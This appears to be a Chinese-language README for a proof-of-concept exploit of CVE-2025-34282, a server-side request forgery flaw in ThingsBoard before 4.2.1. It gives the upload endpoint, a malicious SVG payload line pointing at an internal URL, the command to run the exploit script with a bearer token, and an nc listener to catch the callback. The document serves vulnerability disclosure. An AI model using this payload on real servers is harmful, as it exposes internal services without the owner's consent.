ThingsBoard IoT 平台 4.2.1 之前版本存在服务端请求伪造(SSRF)漏洞。
拥有租户管理员(Tenant Admin)权限的攻击者可以通过图片上传画廊(Image Upload Gallery)上传一个包含内部 URL 引用的恶意 SVG 文件。当 ThingsBoard 在服务端处理该 SVG 时,会请求所引用的 URL — 从而允许访问未暴露到互联网的内部服务。
| 字段 | 详情 |
|---|---|
| CVE | CVE-2025-34282 |
| 受影响版本 | < 4.2.1 |
| 已修复版本 | 4.2.1 |
| CVSS 评分 | 6.9 中危 |
| CWE | CWE-918(服务端请求伪造) |
| 供应商 | https://thingsboard.io |
POST /api/image 上传恶意 SVG
<object> 标签嵌入 SVG 的 publicLink
ssrf_localhost_5555.svg 载荷嵌入了内部 URL 引用:
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />
上传后,ThingsBoard 服务器会请求 http://127.0.0.1:5555,从而确认 SSRF。
要求:
pip install requests
运行:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>
示例:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...
在运行漏洞利用程序之前,先启动一个监听器以捕获 SSRF 回调:
nc -l 5555
Tamil Mathi T.